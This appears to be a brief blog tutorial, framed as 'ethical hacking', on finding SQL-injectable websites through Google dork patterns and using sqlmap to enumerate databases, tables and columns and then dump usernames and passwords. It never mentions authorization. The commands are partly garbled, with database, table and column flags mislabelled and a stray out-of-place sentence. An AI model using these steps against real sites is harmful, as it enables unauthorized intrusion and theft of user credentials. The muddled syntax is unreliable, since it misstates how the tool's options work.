Hey guys we are come back with another excited ethical hacking post in which we going to show you what is Sql Injection and how hackers or attacker use it to hack websites. So without wasting more time let's get started.
And lots of more this are some example. We use http://www.example.com/php?id=7 for demo purpose.
Sql Injection :-
The code injection used to exploit SQL (Structured Query Language) vulnerabilities. When an error found in SQL of websites. It is basically server side vulnerability. To exploit this type of vulnerabilities the SqlMap is used by hackers or pen testers.
Usage :-
First of all we need to find out sql vulnerable website. We can find for sql vulnerable webs with the help of given google dorks.
- login.php?id=4
- admin.php?id =4
- index.php?id = 4
$ ./sqlmap.py -u "http://www.example.com/php?id=7" --dbs
Now wait until scan is completed and show database tables.
$ ./sqlmap.py -u "http://www.example.com/php?id=7" -D tablename --table
The list of columns in tables of database showed.
$ ./sqlmap.py -u "http://www.example.com/php?id=7" -D tablename -T columnname --column
Now list of username, passwords, information, etc. showed on interface.
$ ./sqlmap.py -u "http://www.example.com/php?id=7" -D tablename -T columnname -C colmunname --dump
Now all the data downloaded on you device as a txt file.
So that's all you can learn more about sqlmap it is just a basic thing and i hop you guys enjoyed this a lot and find informative for you. Thanks for visit have a nice day.
Mohit Saran(Hacker's King)
.jpg)
